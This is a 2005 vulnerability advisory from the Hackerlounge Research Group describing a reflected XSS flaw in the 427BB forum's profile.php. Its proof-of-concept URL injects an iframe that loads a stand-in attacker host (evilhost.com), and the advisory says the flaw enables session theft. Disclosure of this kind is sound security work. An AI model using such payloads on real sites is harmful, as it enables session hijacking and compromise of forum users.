427BB profile.php XSS vulnerability.
[][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][]
[]
[] HRG - Hackerlounge Research Group
[] Release: HRG007
[] Monday 03/01/05
[] 427BB
[]
[] The author can't be held responsible for any
damage
[] done by a reader. You have your own resonsibility
[] Please use this document like it's meant to.
[]
[][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][]
Vulnerable: 427BB (Any Version)
---
General Information:
427BB Is a simple board and I have no idea why I'm
releasing this because Its Very unpopular But I said
What the hell. Its based on PHP And MySQL
---
Description:
In profile.php there is a user var that is
vulnerable to a XSS attack by a remote attacker. The
user string isn't filtered of < > or ". This makes is
very easy for a attacker to steal a session and many
other things.
---
PoC Code
Place the following code into the the url then
reload the profile page and it will execute this
code.
profile.php?user=%3Ciframe%20src=http://www.evilhost.com%20height=1%20width=1%3E%3C/iframe%3E
This is very unsafe and vuln because you can execute
any code you would like and can lead to manger damage
of the forum you are attacking.
---
Fix and Vendor status:
Vendor has been notified, expect official patch soon.
---
Greetz:
All the people at hackerlounge.com, JWT,
TGS-Security.com and JWT-Security.net.
Specifically:
Th3_R@v3n (me), Dlab, Riddick, Enjoi, Blademaster,
Modzilla, Pingu, Jake Johnson, Afterburn, airo,
cardiaC, chis, ComputerGeek, deep_phreeze, dudley,
evasion, eXtacy, Mattewan, Afterburn,
Thanatos_Starfire, Roz, Sirross, UmInAsHoE, Infinite,
Slarty, NoUse, Snake (I hate you), Surreal (I hate
you), -=Vanguard=-, The_IRS, puNKiey, driedice,
Carnuss, oKiDaN, Mr.Mind, dementis, net-RIDER,
voteforpedro, Cryptic_Override, kodaxx,
~CreEpy~NoDquE~, Brainscan, the_exode,
phillysteak12345, DerrtyJake, =>HeX<=, m0rk, and
anyone else I forgot.
---
Credit:
HRG - Hackerlounge Research Group
http://www.Hackerlounge.com
Partial credit is also given to
lancastertechnologies.org, founded by JWT.
[][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][]
[]
[] HRG - Hackerlounge Research Group
[] Release: HRG007
[] Monday 03/01/05
[] 427BB
[]
[] The author can't be held responsible for any
damage
[] done by a reader. You have your own resonsibility
[] Please use this document like it's meant to.
[]
[][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][]